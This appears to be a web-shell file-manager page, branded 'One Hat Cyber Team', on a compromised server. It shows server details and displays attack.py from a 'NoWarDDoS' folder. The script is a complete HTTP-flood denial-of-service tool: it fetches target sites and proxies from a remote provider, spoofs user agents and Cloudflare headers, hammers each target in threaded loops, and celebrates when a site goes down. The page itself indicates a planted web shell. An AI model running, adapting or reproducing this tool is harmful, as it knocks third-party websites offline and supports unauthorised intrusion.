One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
vo
/
ddos
/
NoWarDDoS
/
View File Name :
attack.py
import os import platform from argparse import ArgumentParser from concurrent.futures import ThreadPoolExecutor from gc import collect from os import system from sys import stderr from threading import Thread from time import sleep from random import choice import cloudscraper from loguru import logger from pyuseragents import random as random_useragent from requests.exceptions import ConnectionError from urllib3 import disable_warnings import settings from RemoteProvider import RemoteProvider disable_warnings() parser = ArgumentParser() parser.add_argument('threads', nargs='?', default=settings.DEFAULT_THREADS) parser.add_argument("-n", "--no-clear", dest="no_clear", action='store_true') parser.add_argument("-p", "--proxy-view", dest="proxy_view", action='store_true') parser.add_argument("-t", "--targets", dest="targets", nargs='+', default=[]) parser.set_defaults(verbose=False) parser.add_argument("-lo", "--logger-output", dest="logger_output") parser.add_argument("-lr", "--logger-results", dest="logger_results") parser.set_defaults(no_clear=False) parser.set_defaults(proxy_view=False) parser.set_defaults(logger_output=stderr) parser.set_defaults(logger_results=stderr) args, unknown = parser.parse_known_args() no_clear = args.no_clear proxy_view = args.proxy_view remoteProvider = RemoteProvider(args.targets) threads = int(args.threads) submitted_tasks = [] executor = ThreadPoolExecutor(max_workers=threads * 2) logger.remove() logger.add( args.logger_output, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> |\ <cyan>{line}</cyan> - <white>{message}</white>") logger.add( args.logger_results, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> |\ <cyan>{line}</cyan> - <white>{message}</white>", level="SUCCESS") def check_req(): os.system("python3 -m pip install -r requirements.txt") os.system("python -m pip install -r requirements.txt") os.system("pip install -r requirements.txt") os.system("pip3 install -r requirements.txt") def mainth(site: str): scraper = cloudscraper.create_scraper( browser=settings.BROWSER, ) scraper.headers.update( {'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'}) logger.info("STARTING ATTACK ON " + site) count_attacks_for_current_site = 0 try: attack = scraper.get(site, timeout=settings.READ_TIMEOUT) if attack.status_code >= 302: for proxy in remoteProvider.get_proxies(): if proxy_view: logger.info('USING PROXY:' + proxy["ip"] + " " + proxy["auth"]) scraper.proxies.update( {'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'}) response = scraper.get(site, timeout=10) if 200 <= response.status_code <= 302: while (count_attacks_for_current_site < settings.MAX_REQUESTS_TO_SITE): response = scraper.get(site, timeout=10) if response.status_code >= 400: break count_attacks_for_current_site += 1 logger.info(f"Successful attack of {site}; attack count: {count_attacks_for_current_site}; code: {response.status_code}") else: while (count_attacks_for_current_site < settings.MAX_REQUESTS_TO_SITE): response = scraper.get(site, timeout=10) if response.status_code >= 400: break count_attacks_for_current_site += 1 logger.info(f"ATTACKED {site}; attack count: {count_attacks_for_current_site}; RESPONSE CODE: {response.status_code}") if count_attacks_for_current_site > 0: logger.success("SUCCESSFUL ATTACKS on " + site + ": " + str(count_attacks_for_current_site)) except ConnectionError as exc: logger.success(f"{site} is down! =^_^=") except Exception as exc: logger.warning(f"Error: {exc}; number of successful attacks: {count_attacks_for_current_site}") def clear(): if platform.system() == "Linux": return system('clear') else: return system('cls') def cleaner(): while True: sleep(60) if not no_clear: clear() collect() def runningTasksCount(): r = 0 for task in submitted_tasks: if task.running(): r += 1 if task.done(): submitted_tasks.remove(task) if task.cancelled(): submitted_tasks.remove(task) return r if __name__ == '__main__': if not no_clear: clear() check_req() Thread(target=cleaner, daemon=True).start() sites = remoteProvider.get_target_sites() # initially start as many tasks as configured threads for _ in range(threads): submitted_tasks.append(executor.submit(mainth, choice(remoteProvider.get_target_sites()))) while True: currentRunningCount = runningTasksCount() logger.info("Currently running tasks: " + str(currentRunningCount)) while currentRunningCount < threads: submitted_tasks.append(executor.submit(mainth, choice(remoteProvider.get_target_sites()))) currentRunningCount += 1 sleep(1)